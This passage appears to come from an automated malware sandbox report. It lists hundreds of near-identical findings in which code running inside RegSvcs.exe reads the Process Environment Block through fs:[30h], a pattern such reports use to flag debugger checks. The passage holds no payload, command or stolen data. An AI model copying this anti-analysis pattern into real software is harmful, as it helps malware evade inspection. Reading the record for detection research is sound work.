                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov eax, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov eax, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov ecx, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov eax, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013363C0 mov eax, dword ptr fs:[00000030h]7_2_013363C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136C3CD mov eax, dword ptr fs:[00000030h]7_2_0136C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A823B mov eax, dword ptr fs:[00000030h]7_2_012A823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A826B mov eax, dword ptr fs:[00000030h]7_2_012A826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4260 mov eax, dword ptr fs:[00000030h]7_2_012B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4260 mov eax, dword ptr fs:[00000030h]7_2_012B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4260 mov eax, dword ptr fs:[00000030h]7_2_012B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138625D mov eax, dword ptr fs:[00000030h]7_2_0138625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A250 mov eax, dword ptr fs:[00000030h]7_2_0136A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A250 mov eax, dword ptr fs:[00000030h]7_2_0136A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01338243 mov eax, dword ptr fs:[00000030h]7_2_01338243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01338243 mov ecx, dword ptr fs:[00000030h]7_2_01338243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6259 mov eax, dword ptr fs:[00000030h]7_2_012B6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA250 mov eax, dword ptr fs:[00000030h]7_2_012AA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov ecx, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE284 mov eax, dword ptr fs:[00000030h]7_2_012EE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE284 mov eax, dword ptr fs:[00000030h]7_2_012EE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330283 mov eax, dword ptr fs:[00000030h]7_2_01330283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330283 mov eax, dword ptr fs:[00000030h]7_2_01330283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330283 mov eax, dword ptr fs:[00000030h]7_2_01330283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C02E1 mov eax, dword ptr fs:[00000030h]7_2_012C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C02E1 mov eax, dword ptr fs:[00000030h]7_2_012C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C02E1 mov eax, dword ptr fs:[00000030h]7_2_012C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013862D6 mov eax, dword ptr fs:[00000030h]7_2_013862D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346500 mov eax, dword ptr fs:[00000030h]7_2_01346500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E656A mov eax, dword ptr fs:[00000030h]7_2_012E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E656A mov eax, dword ptr fs:[00000030h]7_2_012E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E656A mov eax, dword ptr fs:[00000030h]7_2_012E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8550 mov eax, dword ptr fs:[00000030h]7_2_012B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8550 mov eax, dword ptr fs:[00000030h]7_2_012B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013305A7 mov eax, dword ptr fs:[00000030h]7_2_013305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013305A7 mov eax, dword ptr fs:[00000030h]7_2_013305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013305A7 mov eax, dword ptr fs:[00000030h]7_2_013305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D45B1 mov eax, dword ptr fs:[00000030h]7_2_012D45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D45B1 mov eax, dword ptr fs:[00000030h]7_2_012D45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E4588 mov eax, dword ptr fs:[00000030h]7_2_012E4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B2582 mov eax, dword ptr fs:[00000030h]7_2_012B2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B2582 mov ecx, dword ptr fs:[00000030h]7_2_012B2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE59C mov eax, dword ptr fs:[00000030h]7_2_012EE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC5ED mov eax, dword ptr fs:[00000030h]7_2_012EC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC5ED mov eax, dword ptr fs:[00000030h]7_2_012EC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B25E0 mov eax, dword ptr fs:[00000030h]7_2_012B25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE5CF mov eax, dword ptr fs:[00000030h]7_2_012EE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE5CF mov eax, dword ptr fs:[00000030h]7_2_012EE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B65D0 mov eax, dword ptr fs:[00000030h]7_2_012B65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA5D0 mov eax, dword ptr fs:[00000030h]7_2_012EA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA5D0 mov eax, dword ptr fs:[00000030h]7_2_012EA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE420 mov eax, dword ptr fs:[00000030h]7_2_012AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE420 mov eax, dword ptr fs:[00000030h]7_2_012AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE420 mov eax, dword ptr fs:[00000030h]7_2_012AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AC427 mov eax, dword ptr fs:[00000030h]7_2_012AC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA430 mov eax, dword ptr fs:[00000030h]7_2_012EA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8402 mov eax, dword ptr fs:[00000030h]7_2_012E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8402 mov eax, dword ptr fs:[00000030h]7_2_012E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8402 mov eax, dword ptr fs:[00000030h]7_2_012E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133C460 mov ecx, dword ptr fs:[00000030h]7_2_0133C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DA470 mov eax, dword ptr fs:[00000030h]7_2_012DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DA470 mov eax, dword ptr fs:[00000030h]7_2_012DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DA470 mov eax, dword ptr fs:[00000030h]7_2_012DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A456 mov eax, dword ptr fs:[00000030h]7_2_0136A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A645D mov eax, dword ptr fs:[00000030h]7_2_012A645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D245A mov eax, dword ptr fs:[00000030h]7_2_012D245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B64AB mov eax, dword ptr fs:[00000030h]7_2_012B64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133A4B0 mov eax, dword ptr fs:[00000030h]7_2_0133A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E44B0 mov ecx, dword ptr fs:[00000030h]7_2_012E44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A49A mov eax, dword ptr fs:[00000030h]7_2_0136A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B04E5 mov ecx, dword ptr fs:[00000030h]7_2_012B04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132C730 mov eax, dword ptr fs:[00000030h]7_2_0132C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC720 mov eax, dword ptr fs:[00000030h]7_2_012EC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC720 mov eax, dword ptr fs:[00000030h]7_2_012EC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E273C mov eax, dword ptr fs:[00000030h]7_2_012E273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E273C mov ecx, dword ptr fs:[00000030h]7_2_012E273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E273C mov eax, dword ptr fs:[00000030h]7_2_012E273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC700 mov eax, dword ptr fs:[00000030h]7_2_012EC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0710 mov eax, dword ptr fs:[00000030h]7_2_012B0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E0710 mov eax, dword ptr fs:[00000030h]7_2_012E0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8770 mov eax, dword ptr fs:[00000030h]7_2_012B8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0770 mov eax, dword ptr fs:[00000030h]7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E674D mov esi, dword ptr fs:[00000030h]7_2_012E674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E674D mov eax, dword ptr fs:[00000030h]7_2_012E674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E674D mov eax, dword ptr fs:[00000030h]7_2_012E674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01334755 mov eax, dword ptr fs:[00000030h]7_2_01334755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133E75D mov eax, dword ptr fs:[00000030h]7_2_0133E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0750 mov eax, dword ptr fs:[00000030h]7_2_012B0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2750 mov eax, dword ptr fs:[00000030h]7_2_012F2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2750 mov eax, dword ptr fs:[00000030h]7_2_012F2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B07AF mov eax, dword ptr fs:[00000030h]7_2_012B07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013647A0 mov eax, dword ptr fs:[00000030h]7_2_013647A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135678E mov eax, dword ptr fs:[00000030h]7_2_0135678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D27ED mov eax, dword ptr fs:[00000030h]7_2_012D27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D27ED mov eax, dword ptr fs:[00000030h]7_2_012D27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D27ED mov eax, dword ptr fs:[00000030h]7_2_012D27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B47FB mov eax, dword ptr fs:[00000030h]7_2_012B47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B47FB mov eax, dword ptr fs:[00000030h]7_2_012B47FB
